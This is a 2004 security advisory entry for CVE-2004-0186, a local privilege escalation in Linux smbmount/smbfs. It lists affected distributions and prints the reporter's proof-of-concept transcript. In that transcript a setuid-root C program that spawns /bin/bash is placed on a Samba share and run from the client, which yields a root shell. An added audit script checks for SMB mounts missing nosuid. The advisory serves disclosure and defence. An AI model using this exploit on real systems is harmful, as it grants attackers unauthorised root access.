| Title |
Linux Kernel Samba Share Local Privilege Elevation Vulnerability |
| Published |
2004-02-09-12:00AM |
| Updated |
2004-09-15-07:09PM |
| Class |
Access Validation Error |
| CVE |
CAN-2004-0186 CVE-2004-0186 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery of this vulnerability has been credited to Martin Fiala <digri@dik.cvut.cz> |
| Vulnerable |
Samba Samba 2.2.8 a
MandrakeSoft Linux Mandrake 9.2
MandrakeSoft Linux Mandrake 9.2 amd64
S.u.S.E. Linux 8.1
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.1
Samba Samba 2.2.7 a
MandrakeSoft Corporate Server 2.1
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
MandrakeSoft Linux Mandrake 9.0
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
MandrakeSoft Multi Network Firewall 2.0
OpenPKG OpenPKG 1.2
RedHat Linux 9.0 i386
S.u.S.E. Linux Personal 8.2
Slackware Linux 8.1
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Home
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Samba Samba 2.2.3 a
Conectiva Linux 8.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
RedHat Linux 7.3
RedHat Linux 7.3 i386
RedHat Linux 7.3 i686
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
Samba Samba 2.2.3 a
Conectiva Linux 8.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
S.u.S.E. Linux 8.0
Linux kernel 2.6.1 rc2
Linux kernel 2.6.1 rc1
Linux kernel 2.6 test9CVS
Linux kernel 2.6 test9
Linux kernel 2.6 test8
Linux kernel 2.6 test7
Linux kernel 2.6 test6
Linux kernel 2.6 test5
Linux kernel 2.6 test4
Linux kernel 2.6 test3
Linux kernel 2.6 test2
Linux kernel 2.6 test11
Linux kernel 2.6 test10
Linux kernel 2.6 test1
Linux kernel 2.6
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4 |
| Not Vulnerable |
|
| Code |
The following example has been supplied:

"share" - smb server
"slovakia" - smb client

    misko@slovakia:~$ smbmount --version
    Usage: mount.smbfs service mountpoint [-n] [-o options,...]
    Version 3.0.1-Debian

    misko@slovakia:~$ ls -l /usr/bin/smbmount
    -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
    misko@slovakia:~$ ls -l /usr/bin/smbmnt
    -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
       ^
Confirmed to be default on Debian and Mandrake.

    share:/data/share# cat a.c
    main()
    {
        setuid(0);
        setgid(0);
        system("/bin/bash");
    }

    share:/data/share# make a
    cc a.c -o a
    share:/data/share# chmod +s a
    share:/data/share#

share:/etc/samba/smb.conf

    [share]
    path = /data/share
    writable = no
    locking = no
    public = yes
    guest ok = yes
    comment = Share

    share:/data/share# ls -l a
    -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a

    misko@slovakia:~$ ls -l pokus/a
    -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
    misko@slovakia:~$ pokus/a
    root@slovakia:~# id
    uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
    root@slovakia:~#
|
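An added defensive example, not part of the advisory or the reporter's code: the transcript above succeeds because the client honours the setuid bits of files on the mounted share, so this script flags smbfs/cifs entries in a /proc/mounts-style table that lack the nosuid option and lists setuid/setgid files beneath them. The sample mount table and the function names (smb_mounts_without_nosuid, suid_files_under, audit) are constructed for illustration; only the "pokus" mountpoint name comes from the transcript.

```shell
#!/bin/sh
# Added example (not from the advisory): audit SMB mounts that honour setuid bits.
# Input format is that of /proc/mounts: device mountpoint fstype options dump pass

# Constructed sample mount table. "pokus" is the mountpoint name used in the
# transcript; every other entry is made up for illustration.
SAMPLE_MOUNTS='/dev/hda1 / ext3 rw 0 0
//share/share /home/misko/pokus smbfs rw 0 0
//share/docs /mnt/docs smbfs rw,nosuid,nodev 0 0
//filer/pub /mnt/pub cifs rw,nodev 0 0'

# Read a mount table on stdin and print the mountpoint of every smbfs/cifs
# mount whose option list does not contain "nosuid".
smb_mounts_without_nosuid() {
    awk '$3 == "smbfs" || $3 == "cifs" {
        n = split($4, opts, ",")
        safe = 0
        for (i = 1; i <= n; i++) if (opts[i] == "nosuid") safe = 1
        if (!safe) print $2
    }'
}

# List setuid/setgid regular files under a directory without descending
# into other filesystems. Unreadable or missing paths are skipped silently.
suid_files_under() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Read a mount table on stdin; warn about each SMB mount lacking nosuid and
# show any setuid/setgid files a local user could execute from it.
audit() {
    smb_mounts_without_nosuid | while read -r mp; do
        echo "WARN: $mp is mounted without nosuid"
        suid_files_under "$mp" | sed 's/^/  setuid or setgid file: /'
    done
}

# Demonstration on the constructed table.
printf '%s\n' "$SAMPLE_MOUNTS" | audit
# On a live system: audit < /proc/mounts
```

Mountpoints containing spaces appear escaped (`\040`) in /proc/mounts, so the file listing step will skip them; the nosuid warning is still printed.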